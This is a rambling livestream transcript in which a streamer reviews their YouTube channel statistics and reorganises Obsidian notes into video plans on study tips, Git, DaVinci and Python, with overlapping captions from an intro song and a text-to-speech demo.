Welcome to my stream, where knowledge reigns supreme. Calm and collected, I'm about to go live, you know what I mean. Got high expectations, gonna teach you something new. Learning, hacking, exploring, there's so much we can do. Feel the excitement as we dive into uncharted lands. New discoveries await in this digital wonderland. Together we'll unravel the secrets, unlock the code. No limits, no boundaries, no knowledge will explode. Welcome to my stream, where the fire of knowledge burns bright. Chat with me, let's embark on this journey of delight. From the basics to superpowers, we'll learn and grow in this stream of knowledge. Together we'll grow.
Connected to channel Fix at 42.
Welcome to my stream, where knowledge reigns supreme. Calm and collected, I'm about to go live, you know
Fixerbot
what I mean.
says.
Got high
T-3 minutes.
expectations, gonna teach you something new. Learning, hacking, exploring, there's so much we can do. Feel the excitement as we dive into uncharted lands. New discoveries await in this digital wonderland. Together we'll unravel the secrets, unlock the code. No limits, no boundaries, no knowledge will explode. Welcome to my stream, where the fire of knowledge burns bright. Chat with me, let's embark on this journey of delight. From the basics to superpowers, we'll learn and grow in this stream of knowledge. Together we'll grow. Welcome to my stream, where knowledge reigns supreme. Calm and collected, I'm about to go live, you know what I mean. Got high
Stream about to start. 1 minute left.
Gonna teach you something new. Learning, hacking, exploring, there's so much we can do. Feel the excitement as we dive into uncharted lands. New discoveries await in this digital wonderland. Together we'll unravel the secrets, unlock the code. No limits, no boundaries, no knowledge will explode. Welcome to my stream, where the
starting the lights at the exact second. So I went and got some breakfast. There. So, a bit late. I have to get some service on my car. Typical. Yeah, so today, unfortunately, the lifetime here of my YouTube channel, I started quite much before I actually put any videos on there. So, anyway, the thing is, I haven't put any videos here on for 1.5 years. And part of that is that it's about when I started streaming, right? So I was going to do more stuff. That was the plan. I've also talked a lot about making a Python tutorial. There's also other things I've been thinking, why not make a video on this, right? But on this channel, this is supposed to be short videos. Can you see the length of them here? So it's not like just random babbling about, just random talk for 12 hours, you know? It's efficient stuff. Let's see, can I hop back here? Let's just go back to Netflix. Well, it's red too. That's the only similarity. Well, there's videos too. Let's hop here and let's go to channel. Apparently it decided I wanted to see, but this is, I like its channel. It's cute with animals. New one 14 hours ago. Oh well, let's see. Channel? Yeah. Oh right, I know what that was. Why I saw other videos, because I'm not usually using this one now. I'm using the Fixit 42 live one. That's why. So, this is a non-live one. Also, I'm closing up to 1,000 subscribers, and I don't know, people still subscribe, though it actually says 2023 on this one. So I kind of plan to change the date to 2024 on this one at least, so it sounds as it's still like current, you know. And that this problem isn't solved by Android is kind of funny. So that video is still going, but check the length of the videos, right? So this doesn't count. This was just, I made it for someone. And then I thought, well, I could just show it too, not have it hidden. So this is 8 minutes, 1:56, 6 minutes, 6 minutes, and these are like full tutorials with lots of details, but not a lot of random stuff, you know? Like, you, blah, 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 thinking before you speak, just mumbling. So it's kind of like efficient. So
Please provide the path to the Android SDK. And what did I do? The usual thing nowadays?
It's kind of
I Googled.
efficient. Just giving the solution to that. That was a quick problem, so it was a quick video.
Come back to my file. Windows warns us that it doesn't recognize Epic Games or Xbox Games.
So I've like cut a lot of stuff out.
We have to make these selections every time. If we choose
being like efficient, you know, in explaining stuff.
Let's start with select game. I will begin with
so I want to make this kind of video, but no, I don't want to make it. This is stuff I researched for my kid, right? So research for kids, and I don't think he plays this game a lot anymore. Though I watched actually my 14-year-old. He was watching a video about the game yesterday, so we'll see. Maybe they'll keep you wanting to do it. Anyway, at the start of the videos, I have this like.
Back to my channel, since I still
so this is like the thing. I've put these like these are the tutorials, so I still haven't made these. like in this exists in an older version, right? So this is the current video contents. So I'm thinking I'll use the same way of putting the series of videos and what is in this video, right? Yeah. So a lot of people like this a lot, and that's fun, you know, when people appreciate it. You put some time into finding out and explaining.
Googled. I didn't find.
And for this one, people are like, you're a lifesaver. So this is a bug when you upgrade Android. SDK. Or Android Studio. So a lot of people didn't find the very simple solution. That's well, it's nice to be able to help people too, and not a lot of people watch streams, right? So compared, let's switch to this channel, right, that I'm streaming on now, which is my live one. So if we switch to the live, I think I have one video on one other normal channel. But yeah, we have to hop to. Let's open a new one so we can still see those. So this one is like. This is the. I started a few months ago, I guess. And this is a current stream we're doing right now. Yeah, also Twitch had a new feature. You could like put short video, and this is horribly, it's so bad quality. So you shouldn't ask it to do it. I didn't do this on purpose, really. Not the quality, it's bad quality. Well, everything on this channel is like quick, it's all live, it's the videos that exist are this is my backup channel, really. I use this for backup, taking backup of Twitch. And I also have uploaded, well, I haven't finished all of the days of, but these are just cut from stream, so it's 1 hour. If I were to make a high quality one of this, I wouldn't do it like that. I would prepare, I would make, plan a video. So this is just the stream cuts, and full streams mostly. So it's just that, nothing else. And long videos, 6 hours. I've had to cut several streams in half to be able to even upload them. By the way, I want to go outside again, though today it is minus 1.7 and there's snow. I don't want to go walking today. So I'm gonna be in the library while I wait at my kid's school. Doing last time I did some Pico CTF actually. So yeah, so since I started uploading the streams, I've had a backup here. I've been planning to upload also the older ones. So how long did I start this channel? How long ago? 7 months? 8 months. So this is what I'm not calling high quality content. This is streaming. And streaming is streaming, high quality, I mean focused. You have cut the video, put time into it. I did cut the last few ones there. So 9 months ago, since I started this one and got a backup of the streams. Oh look, it's actually Advent of Cyber 2023 there. So feels like a year then. Also, I have less subscribers than videos, which is kind of funny. As it's all my streams and also cut out of some of them. But only these 24, I think. And some streams I have to split in two. Some are split in two because of a crash. Or just that it's... Oh, this is very odd. This is not supposed to have this name. Because this is a cut. I even removed the date from the Advent of Cyber once, so I'll fix that later. Let's check at the channel for this one. So I don't know how I managed to get into the channel analytics thingy, but I guess it's somewhere. I think it hopped up and told me go to this. So it says video analytics, channel analytics. This, I guess, then. And then I did lifetime. And then you can see. So we have 1,100 hours. So what's this, you know? Sometimes it's more views. But this is, I just made this for backup, you know? I'm so sorry. My throat really didn't want to. So, also, for recording this kind of video, I wouldn't want to sound like this. Sorry. Whatever, let's continue. So, yeah. So this has like an infinite number of videos, while this channel only has 8. And one is the knitting video that it's not really counting, right? Also, could we see that total? So in this one we see watching hours, right? How do I see that here? Here we can see views though. Oh, watching hours here. So it's, well, closing up to 6,000, I guess we round it up. And we have 289,000 views, 940 subscribers. What's impressions? Whatever. So this video is the most popular. Then I'd guess this one was second, but it's not. It's the old version of this one, right? So this one is a current one. This is the same but older. Then for when they started with Epic Games, I made one for this. The new one is for both. Installing older versions of tabs if you want to run those. Yeah. So let's look at the hours, by the way, because these are short videos, right? This one is longer. So it's actually 0.9 of the total, though it's it's almost 1%, though it is much less views. Because it's like almost 30 minutes long. Let's see, how long is it? 27, yeah. So it's just me explaining a knitting machine. So if I do this thing, I should have a separate channel, right? So maybe I should remove this one again, I don't know. It's also Swedish. But this is at least well cut and stuff, right? Yeah. So I have like plans and stuff, but I always stream when I have the opportunity to do this kind of thing, right? So I thought, well, let's at least make a plan and maybe start doing something today. And it's not like the closest thing to this that I've done recently was the short video for LinkedIn. that I made when TryHackMe released the Security 101. What's it called? Cybersecurity 101, right? Called. So, but then I didn't cut much. I just cut like in one place, I think. Well, I did cut it, but not a lot. So, and I recorded it without a script. It was just like me babbling on. And the reason I had to edit it at all was that I had like, I open these tabs up and I'll look at them, and then I kind of, maybe my browser reloaded or something, so it wasn't up as I had planned it to be. So I redid that part of it. Otherwise I was just babbling. So, not the high quality thing I wanted, right? Yeah. Let's go to the plans. So open the notes. I don't know if I have this in my private or my public one, because the private one, it's not just what's private, it's what's not interesting for anyone else, right? So but my stream plans or YouTube video plans or whatever, it's not interesting to anyone else. So we could assume it's in the private one. So let's just we already have well, let's move it to the other screen. This is already up with all the normal notes. Right, now we'll have a gray version of the other one. So we'll get the private one, right? Yeah, so it's some notes from a Neil stream, meaning cybersecurity that I had up. Let's see, about looking for work, of course, then. So I haven't looked at these notes for a long time. Oh, shortcuts. Yeah, this is when I started making notes. I had them combined, you know. But then when I made a GitHub repo, I had to remove the stuff that's not. So I have stuff about my kids there too, I think. About my company, it's not a much though. So, Suno. Yeah, so the prompt for the song that's on the start of the stream is here. And also it says calm and collected in there. Fine, I might be, but that's time I try to make a calm song. You try different things, you know. So it misunderstood. But I think it's good. So it's not like I can change the lyrics of the song afterwards. So here we have like stuff for the stream. So here's YouTube. I was like not scrolling far enough. So we have YouTube. What's this? Oh yeah. So I noticed some people have like talk about like videos talking about the stream. So if I'm changing it a lot, nah, but I don't think that's my thing. I'm more like get people help with whatever they need quickly, not just like, yeah. So even the welcome back to my channel thingy I said there is like, but you need to say something at the start that people don't have their brain on yet, right? Oh, so this is about OBS and the monitor mode in the settings here for audio. So, okay, so I don't really exactly remember what it was there. But here's the Python thing. I used to have my script for stuff on Google Docs. So yeah, that's on my Discord too. I thought of it when the Discord. Study without working. Yeah. Well. And then you see all my old thoughts from this is years ago. Oh right, I have a video and photos of converting my old phone with the green cable that we've used actually. So I think it's starting to get a bit warm in here. Maybe I will turn off the yeah, it's not there. I'll just so I guess I have a bit of a cold or something. It's cold outside. So also yesterday we went to IKEA or IKEA as it's called in Swedish. Very totally different word, right? We got my kid some furniture, so we gotta build it later. That'll be fun. So yeah, zip files. People have so many things. Well, Rubik's cubes are not really my thing, but some people. So my kid got interested, so I had to teach her. Not that I knew it before. Speed up videos. Yeah, this we might do. Yeah, tips about these great tools for learning them. Then it's connected to the learning one. Yeah, that's why it's not working, because you're doing other stuff. You just do something to listen to. Make app OBS remote. To make simple Android app. Okay. So that was something I thought about doing. Twitch to YouTube. Alright, so this is when I started moving stuff. So at first I had to just start uploading stuff. And then I started streaming to both. And then it wasn't the same thing. But I'm still uploading, and it takes a lot of time for it to upload stuff. Let's do that, by the way. Oh, so we'll make a new plan. So, why did remove the video thingy here? It's horrible. I don't want the creator dashboard or anything. I always want to go to video producer, right? This is the only place I am ever at in this thing. So we noticed in here somewhere. Oh, so what's the other page here? That I hadn't uploaded all of them. I should remove Netflix from there. It's not it's mega useful. So, studio, content. In here too, we can see the live ones. Can we see a count? And now there's actually one thing here because of the Twitch upload. This is from Twitch. Twitch did this. Well, with my permission, of course, but I didn't think it would get that bad quality. Maybe we'll make shorts so they're actually good quality. That was horrible. Yeah, so D21, that's where we're at. And let's check the... So I can't see... This one has a long date. So let's edit the name here. So I think I saw another one too. It had the date on the, I don't know, cyber one. Whatever. If I see it, I'll fix it. So the 22nd, let's upload the 22nd. Maybe just to show how horribly long it will take, right? So I did all the highlighting. I'm so happy to be finished. As I did this highlighting more carefully, as it's like going to be uploaded to YouTube, but they're still bad. This is part of it inspired me to get started again. So I realized the order is wrong, right? So I just wanted to double check that it didn't say 22, 21. But it's actually 22, and then we have 20. Well, 22 is the next one. So we just export, public, start export. And then if 23 is much longer, which it's not, we could start this at the same time and we'll get them in the same order. But if I were to start this one at the same time now, it would just, like, end up being in the wrong order here. So, 7th is the last one I uploaded of the normal ones. So the highlight ones there. 7th. So, we can do the 8th. Let's change the name of this. So I guess the stream is mostly me working on this. 7, right? No? Oh, 8? My god. That's very, very, very nice. So you can't see it in here. You have to get back here and see. Yeah, so we can upload this one too. And they take a long time to upload. So at least it has finished the last one. So eventually, after hours and hours and hours. And then we can see this one is in the list, but the last one we did is not here yet. Sometimes also I started one twice because I'm like, okay, it failed. Because it never appears. So it's a bit annoying when stuff doesn't work as you want it to. Whatever, let's go back to this channel, because this is what we want to like. I don't get really why people still watch these videos, but they do, so I guess I'm happy about that. But I want to make new stuff now. And yeah. Let's hop back. How do I just X this? So on the dashboard thingy. So 21 people subscribed to the channel in the last 28 days, though I haven't done anything with it in 1.5 years. So lost 48 hours. Did people actually watch this 540 times? That sounds very odd. It's a lot of views then. Well, so I knew that it's still like 100 views per day on the channel, but that's a lot. But I guess it goes up and down. Yeah, it's been the weekend, right? So if it's about 100 a day, it'll be like that. Weekend is of course higher. Yeah, so let's not upload a video because I don't have one finished, but we're gonna plan stuff and we're gonna make some good videos. High quality stuff instead of the just streaming and just cutting a bit of stream out, you know, thingy. So what should we make videos about? Let's get started with I'm thinking my current public notes. Should we put this in there or should I keep it in here? Should we even put it on Docs? Google Docs. Yeah, so here I have like my kids and stuff, martial arts. Yeah, I was thinking for a bit that, yeah, learning like a back massage too would be fun. Minecraft server. So here you can see the password for my Minecraft. No, I haven't written down. It's in my head. Yeah, like you don't care about my university studies, you know. So these are the. It's not private because it's secret mostly. It's private because it's not interesting to anyone else. So mic idea. Aha! Oh look, this was so long ago. We could delete this. Let's get rid of old notes. So currently my mic is over here. I'll just show you how the mic is right now, because I had one of these and it kept being in the way of my screen, which is very annoying. Oh, I'm still sleeping according to the app. Let's turn app off. Apparently I didn't sleep much during the night, it thinks. That means that probably the app was active, because it thinks yeah, it's kind of bad. I have to go and when that happens I have to delete awake and then I can see that I was actually sleeping. It's just that one app was active and it thought I was using the phone. So just delete the last hours here when I wasn't actually sleeping. There, so now we can use this as a phone camera. So you can see how messy my desk is. So, I guess we go to desk. Now we need the app started. So let's see here. Come on, there it is. So I changed how I have my mic. So I currently have it like this, and it's just there by the camera instead of having it on one of these flexible arms. So the microscope is on one of these. So it's zoomed in, that's why I have to go so far. I could have switched the mode, but we'll probably use this mode again next time. So this is actually just an extension thingy. This is something else, and then I have sewed a bit of a pen and put over it because it was it's silver underneath there, so it looks prettier. So yeah, so I can close the phone, and it's still on this app. It's kind of smart. Nice app. I have to stop the app first. So I know time flies as always. I kind of want to put this in my normal notes, and we can work on it together on stream, right? Because it's more like a. It's not like there's not already a lot of stuff here, right? Planning to do. well, let's say that some of this ran out, and as I was doing Advent of Cyber, I didn't dare to wait anymore to activate it, and I know what it is now, but I didn't. I was thinking, yeah, so if I focus, I could do all of this in 1 month. But I've been doing all of the other stuff that I can stream instead, right? And I also have this that I need to do. And let's turn that off because it's getting warm. It's 26.8 in here now. That's starting to get a bit warm for me. It's probably warmer exactly here though than over there too. Yeah, so it's connected because the projects too. So we might make videos on stuff that's projects. So I just put everything here for a bit. Nothing special. Yeah, so we can definitely make a... In the main area here, if we create a new node, that is YouTube. I guess I make the T there. Uppercase T. Let's see. Plans. YouTube video plans, right? Let's do fix it channel. So, what are the plans? Let's put these notes on the other screen so we can just make sure we have everything in there, right? So I'm not abandoning tabs. I know that like a lot of the subs I have, they like it, but maybe they also liked it like 4 years ago, right? And maybe they have moved on and, you know, became not kids anymore. I also know that adults play games. It's okay. I do it sometimes. So if we look at this list and remove the microscope, I was thinking, is it on? That's a test image. Oh, okay, the microscope is off. This is a test image from the converter. So let's go through all of the YouTube notes. That was just like status things. This is OBS stuff. I thought about doing that more, but I'm kind of thinking there's enough people doing OBS videos, maybe. But I do have stuff I want to show, so maybe maybe we should do like a... Now I'm thinking maybe this shouldn't be one file, but let's put this at the very end. OBS videos. And let's make this a level 2 header. It's kinda big, right? And that's a thought on that. And now we can delete here from this whole thingy. Let's delete that. I guess that we do delete. And then it shouldn't complain about this one. So the thing is that there could be files in here that's not visible. So maybe we should delete it from this view instead. So it's kind of nice, right? We can see public notes, private notes, different colors. And that's my backup, the Twitch to YouTube. Let's call it backup. Well, it's not only backup. I had other thoughts. I don't think I will, like, put all my highlights because it's so much work uploading. So for now, the highlights are just on Twitch. So there's like separate videos of everything on Twitch only. Yeah, I am a bit hungry. So Twitch, let's see if there's anything about YouTube here. Yeah, so I did make a new second channel and then I'm not using it, so... I don't think there's anything here, really. Let's just close Twitch down. Video editing was a shortcut for DaVinci. Yeah, so I've been thinking actually about making this a video. How easy DaVinci is, right? So, this is actually on... not on OBS. This is OBS. So I'm doing that, and we're doing creation and videos on. And I'm not sure I'll ever go there, you know? But let's keep the notes because I have those thoughts still. That it would be nice to be able to show people how easy it is. Some people think that, oh, well, DaVinci is a professional program. It must be so complicated, but it's mega simple, right? That kind of thing. That's what I want to show. So, DaVinci. How easy it is. It is. So, there. Then we have, yeah, this is, let's look at it. Yeah, so I'm not gonna do that. I'm not gonna use a face cam either on this channel because it's a distraction. It's not what is important, it is just in the way. If you really want to show something and focus on teaching something to people, I think the cam is just in the way, actually. So, that's for the live one. We'll see. Maybe I'll hop to talking to the camera, and then I'll hop away from it. That's possible. But having it cover up part of the screen all the time, that's not good. Actually, on that channel, I think I thought of it in part because someone said, "Are you a kid or a woman?" I'm like, as I had said in the video that I did research this for my kids, right? This should be kind of obvious if you watch the video. The Python course, right? So maybe we don't need the Python course, and the contents of the course will not be in the public notes because it'll be a course that's not finished yet. So, but this is a kind of like an, let's put dashes on the actual videos. These are videos, or series. Course series, right? And this requires a lot of work to do. So maybe I should do something else first to get started, because it's like getting back to doing it, really. So, here we have notes on the details of the Python course, and that there'll be a tutorial series for beginners, but there'll also be a quick intro to Python for programmers, you know? And there's also, this is like finished planning, installing Python and setting up an editor. That's like ready for recording, really. But I don't want to do that without having the Python course so you can continue, right? It will be like odd to have only how to set up Python. And I want to keep it up to date, you know? So it's like not 2 years older than the other stuff. Here's the latest version of Python, which is 2 years old. Tabs, yeah. So these are like old notes that I put in here from Docs, I think. This is just a text for the video. Downloadable sheets. Right. TTS. Yeah, so I asked the security live if it's okay, but I think it was long ago, so I don't wanna, as he's paying for the TTS, I don't wanna make a video on it, you know, without him being okay with that. I guess it's in this category. Oh my! So I'm not gonna do that now, for sure. Well, I guess I've got a cold. I guess so. So, and it's not just his permission, he needs to like it, otherwise it's no good. So what else did it say here? Build up to pro. I don't know what I'm talking about. Oh, this is a separate idea. Okay. Okay, so this is a thing for an idea, like for the Python course. Well, let's make it learning programming. That's a thought on that. So let's actually, I deleted the other stuff, right? Let's put this in the Python. Tabs, I'm not even putting in that side because it's like, I still want to keep my promise to the tabs people to make a tutorial on installing older mods for the current version and to make mods. I think that's something people wanted a lot, and I don't think it's available at all. So it's a research thingy that no one else might do it, like ever. So, right, that's not a video. This is a video. Maybe this is the first thing we do. I don't know. Let's put it over here. So magic study tips. In private notes. Details in private notes. And it's the same for this. I don't want to put it all in the... It'll like spam the notes, right? Especially since I have this. Oh, on my web page now. So I have not updated it since I first made it, so but it's still here. We have notes. So this file will be here. And I created one called index just for this purpose of actually having a file here. Or we just, you don't have permissions to this directory, right? So I'm looking for something more. I know I have more notes. Might be this in part, but I'm still hungry. Better drink my yogurt. I have 2 minutes, so well, let's get some yogurt and some nyponsoppa. Well, tech videos. Yeah, so maybe not only short ones. Yeah, this is like my thing. I don't want them to be mega long. I want them to be efficient. So, well, we could hope to get some money since I'm not really having an income that's usable right now. As in a bit, I'm driving my kid to school. That's why I couldn't go to work right now, so. Though I'm looking for a remote or hybrid job. So that's the real goal, right? But it would be cool to get the YouTube channel to be, so you can actually get money from it. That would be nice. Tabs video update. Yeah. So as I said, most subs. When I wrote this, I was obviously more focused than I am now on actually like getting money from it. So that's not. But it would be kind of sad to lose all the current subs because it's not relevant anymore. So why so much space? I'm like confused by my notes. Channel video. Right, so they have what? Yeah, not getting to the point. Pauses. Yeah, that's horrible. That's why I'd want it to be efficient. Oh, the phone. Should I even do this? So these phones, I use them for a bit as stream control, but then my hubby switched phones and I have his phone instead. And this one has no battery. Well, it is a battery in there, but it's not like working. Really. I don't know. Maybe this is like a started streaming. So, use old phone as webcam. And it's probably better than any old webcam people have, right? DaVinci. Yeah, this is the same thing that I was just typing there. How easy it is to use. No overwhelming people with all the functions. Open.zip. So obviously I had problems getting people to open zip files or something. I don't know if this is even interesting. Git might be good to tell people how Git works, right? Use Git to make backups or something. Use Git. It's kind of crazy. How much data can we put on Git, right? How much is it okay to put there? So I realized when I put it on my web page that it's like 500 megs. That's the size of it. Because I have like 2 tera only on my web thingy. Yeah, this is yeah, I don't care about that. This I really care about. So might be the first thing we do. Video speed up. So let's actually do this. There. Now let's do the parentheses too. That's better. Even more, it's not important, but I want it to be, or it's not a video ID. So speed up videos. So let's hop back in audiobooks. This is part of the study tips. So. Yes, as I had this idea with the study tips, I didn't have it when I wrote this, so they will be included. Make apps, OBS, make app. Oh, okay. What am I saying? Oh well. Yes, I guess I'm annoyed at having to use Sammy for only this, right? That's probably the reason. And also, it would be nice to be able to use that while you're not at home, right? Like if you're streaming remote. Yeah, you can see that. So, Sammy. I also use an old version because I don't want to switch the apps, so I haven't prioritized doing it. It's not that I don't want to, it's just that it works, so I don't put any thought to it. If it would stop working, I would. Speed up audiobooks. These two are... Let's actually put that in the notes. The Magic Study Tips has its own. new folder, videos, to make. And then we have the magic study tips here, right? And it contains these two. Speed up audiobooks and listen to electronics. So we can delete those. And this. Let's make its own. So this is from Google Docs copied, right? So, then I don't know about the new changes to Chrome. If this will still work. If it doesn't, I guess more people will stop using it. So hop back here, get. It's not like it's. And what did I do? Like get. So this could be 2. Maybe 2. Use get to back up your stuff. Get learn get basics. And maybe that's a part of the Python course too, right? Because Git is like something you need to know. So even when I started making my web page now, I was like, oh, so if I make this change, then I will have lost my old thing. And what if I want to go back? Oh, I'll just get it done. So it's so great. So great. I guess we should use the full name, right? And what I did now was to how easy it is to use is what I wrote down for this one. So let's put all of them in different ones. I'm seeing some categories emerge. I guess this was prettier written, right? I even use uppercase there. So, basics of computer use, right? Are some stuff, and some are more like content creation, and some are computer basics. And that is set. Then we have programming. Though Git is not only programming, it is also computer basics. Okay, yeah. Let's undo. We can't undo because it's not like a text file or something like that. So I'm gonna delete that one. And this is nothing because I just created it. And then we're gonna like tag them and stuff. Then we can have several. So open zip. I think you do it like this. I've never used this before. This is the first time. And then we're gonna copy that to the get one. There. And this is like study tips 2. That's the other one. Well, I want to cut it. Oh, I don't want to cut it. That's study tips. So this is content creation. Yeah, I'm kind of thinking I should have all of the things I have in here. So, study tips. And then we have should have another category later. Let's go back and pop the rest of the things. I guess we start from the bottom. So this is more like a project. It's not like a video. Video to make a simple Android app with buttons to control OBS. For streaming and recording videos. Yeah, so it's not like I have to do this. Maybe I'll leave the Rubik's Cube there too. I'm not that into that. I don't feel like I need to do that or want to do that or anything. This might be a streaming with a budget thingy, right? So someone want to start content creation and have no camera and they don't have any money. So it doesn't have to be dead here. So I'm thinking content creation, but also I guess I will have to underscore all of this. And there. Well, here I have another name. Why is it even that color? It's just because it's indented. Why are stuff? Oh, there was actually like a structure to it. So most people probably don't have dead phones, just because mine was dead. So this might be a 2-step thing. might maybe split into two. We have two, right? So now it actually got life, this idea. It got a reason for existing. Streaming on a budget, right? And it's under this. I put it here, but I didn't think I would ever do it, and now I got a new thought on it, right? So let's go back to blends. We don't have a lot of things left here, and those two we already discarded. So of course tabs, right? Tabs is part of the big things that hopping into here. So I didn't even read what I'm pasting. Oh. Yeah, this sounds very bad. But who wants to lose subs? But it still sounded very bad. Yeah, so this one is just a thing that we could just delete. Yeah, this is the most important thing. And I will, so we could just delete that because it's obvious. Let's see. Let's get some order into this. I don't know why some of them have spaces extra. So yeah. I know why it is like this. This is because it's pasted from Google Docs. That's why. That's why it looks so odd. Because this was just like this. And these were probably indented more with a tab or something. So it was probably like this. Or maybe even... so... that's how it was probably. Whatever. I was a bit confused about the format for this, but now I understand why. We don't need general. So... it was so stretched out so you couldn't read it, right? Let's fix the other ones. They're all this expanded. Alright, the desktop might be nice for... I don't know, I think this is better to just have it... whatever. It can be like this. This one I wrote here, right? This is just also a quick one. I don't know if this was better, but whatever. Those spaces are very odd. So... general plans for videos. Meaning that one should have a dash, because otherwise it will not be visible. Then I have a problem with how it indents stuff. These arrows. I just thought of something. When you export your Obsidian repo, you have this border on this side too, before I turned it off. And it had the contents on the page. Was it like this here too? Yeah. It was. So, if I go to a longer file, like here, so, oh cool, I've like rediscovered something I never knew about. This takes space, I remove it the first time I started using Obsidian, right? So let's go to a big one. I know a big one. We have buffer overflow nodes. They're as long as it gets. So, also that's a video. Oh look. So, now I don't have to split this document up if I can survive having this thing on the side. So what I wanted was to have this underneath the file art, like indenting on here. Maybe this is good enough. Maybe it is. We'll see if I get used to this. Well, now I know it's there. And I only thought of looking for it because of the export having it on as default. And I'm thinking it must come from somewhere. When I first installed Obsidian a very long time ago, did I turn this off? Maybe. And we found it. So I won't have it up always because most nodes are not that long, right? So let's continue structuring this. And let's do new node, buffer overflow. And this is obviously cybersecurity. Oh look, all the ones we have created are here. I've never used these before. Nice. So this doesn't require an explanation, but it requires updating the YouTube video plans to. So I'm thinking I'll start with something easy. Something that is quite short and easy to make, and like bring my like editing skills back and stuff like that, right? I know the buffers. I'm not starting with the buffer overflow, right? I'm not motivated for using SEP. That's too boring and basic. It's not even in the list. But video speed up. It's such a nice thing. I love it. I could definitely. I'm burning for this. And also the using Git to back up your stuff is kind of like a. We can also do Git basics, right? So it's different videos. And I'm thinking, like, would I need to even do any research? Let's do like these two. This is a lot of work. The Git ones, I'm not really like, oh, I would love to do that. But this would be like cool. So I'm thinking magic study tips or video speed up. Which one first? So this is a browser plugin. So I don't know how it is with Chrome and their new thingies. They're turning off stuff, right? If it will still work. So maybe we should do it while it works for everybody. And then they can be like, oh, I love this. And then like, well, at least it worked when I made the video. I don't know. Hopefully it will still work. Poor Chrome users. I'm Firefox. Yeah, there's other problems in the world too. So I hope they will still keep getting money. The Google is the big thing, right? So, as this is just a list, right? Of things to make. And we have the details over here. I guess that we do our magic study tips actually make this a full short. Oh, right. This should be the first real short. So I don't want to remove the other one as it has 26 views, though it's horrible. Yeah, I don't know. People don't even watch those on purpose. They just pop up, right? I don't like shorts or like that kind of format where it's now when you're on Facebook even, it keeps popping up these vertical videos that are not anything I'm interested in. Though it's like a cute kid doing gymnastics, you know, all these, a dog that, I don't know, makes tricks. Things that all humans are like, oh, that's cute. And they want us just to keep watching that kind of thing, and I'm like, no. Right click, remove this kind of thing, and then it pops up a bit later again. So I'm not on Facebook a lot now. I actually wasn't there for months. And then I'm like, I use the Facebook Market sometimes. And I was like shocked. So let's start making the actual video text. Yeah, I kind of started already. This is just a note. I guess we do short here too. To really remember what you learned, you need repetition, right? But that's boring. I usually just listen to stuff as repetition while I can. While I do. Well, there's a lot of stuff. Come to stuff again. You should listen to stuff. Is everything well? Do other stuff. Not working. Right. Like laundry, making dinner, or or even so I hear myself saying it while I type. Not that brain intensive work. Repetitive, not that brain intensive work. On the computer. It's also perfect to listen while taking a walk or jog. Slight smile. Yeah, so that was not from here, right? Oh, right, it's from Discord. I wrote it in Discord first. You can't make a slight smile in the video. You can listen to your notes in Obsidian by installing the plugin Text-to-Speech. You can listen to long articles, so for example for Hacker Rooms, by installing a TTS plugin to your browser. I use read aloud on Firefox. Yes, we need to fix this. The organization of how it works. Yeah, we don't need all this space. I'll have to just rethink. It'll grow. It'll grow. Let's just change the format so that it's actually readable format, right? We can't do dots. Though I can put something up on the screen, right? I need to. So I usually put like I switch to different things in here. So like maybe we could do these. No, we can't. Image of brain learning. Learning works. So perfect to listen to. I should read. I usually just listen to stuff as repetition while I do other things, like cleaning laundry, making dinner, or even repetitive, not about brain-intensive work on the computer. It's also perfect to listen while taking a walk. No, doesn't sound good. Like taking a jog or walk. Sounds better. Or even working, depending on the job, right? You can listen to your notes in Obsidian by installing the plate. Text to speech. You can listen to long articles. You can listen to any text file or text file, PDF or EPUB. By installing the app at Voice on your phone. And then I of course have Android, so let's add links. What I use the most. Yeah, so we don't need to put that in there. This is for when I wrote it. You can see even PDF text files on your phone. So, Voice Aloud Reader. This is the name of it. Voice Aloud Reader on your phone. So, this is going to be split up into sections. This is going to be in the description. So, so now we're going to have examples here, right? I'm thinking in images, seeing what I could put up for this. So I don't think it's worth adding images to the video. It's mostly just words. But here we're going to show it. So we can just do this on all three. And then I will change this when I record. So it's not like it needs to be perfect either. You can listen to long articles, or for example, on. So now we're going cybersecurity here. So this was for Theo. I wrote this to Theo. So that's why it's cybersecurity. By installing a TTS plugin in your browser. Alright, let's see here. track just popped up, reminding me that I actually did quite a lot of. This is I realized that I was most finished with this path, and I don't want to continue with other stuff while not streaming, so I did a few rooms, but not these. I have already done these, but I did the Python basics, and now I should finish this one too. So this one was just, oh, how is it foreign Python, you know? But this one is, there's interesting stuff, though it's also very basic. So, yeah, I think the shape changed. I think they added more stuff to privilege escalation, so that my, like, percentage here is decreased. All of them decrease all the time, right? So this is a percentage. It's 90 and 92. They used to be, maybe fundamentals is 100, yeah. Yeah. So we'll do this soon. Let's continue. So I'm looking at the streak. You're welcome to add me to your friends here. So I wasn't going there. I was going. So this is the plugin I was talking about. Read aloud. I was going to actually get its link, right? So if we read this aloud,
channel dashboard 1.
It just reads the whole boring thing. But if it's an article, you know, that's different. Now I'm very curious if Read Aloud is available in my phone. So let's go to the browser here. Oh, I know there's plugins in Firefox on the phone too. Extensions is cool. Now I have Privacy Badger and uBlock and Dark Reader. But I don't have any Read Aloud for now. So it's just suggested those, and probably because I have them. It's suggesting Foxy Proxy too. Read Aloud. It's suggesting Read Aloud. So if I plus Read Aloud on my phone, the camera is not on. I don't think it's worth it for this. I'm just adding an extension to my Firefox. Access Read Aloud. So let's go to something. Viki. And let's do what possible? Let's do Python just because we had Python, right? So Python programming language, and let's see if I can start this reading this page for us. No, that's the wrong button. Extensions. Read aloud.
Python programming language. This article is about the Python programming language. For the
Meaning it
see
works
Python genus.
on the phone too.
Python is a high-level,
So if you're in the
general-purpose
kitchen making
programming
food,
language.
you don't have to
Its
put
design
on, as
philosophy
I usually
emphasizes
do,
code
Bluetooth
readability with the
headphones.
use of significant
I'm
indentation.
already wearing.
Python.
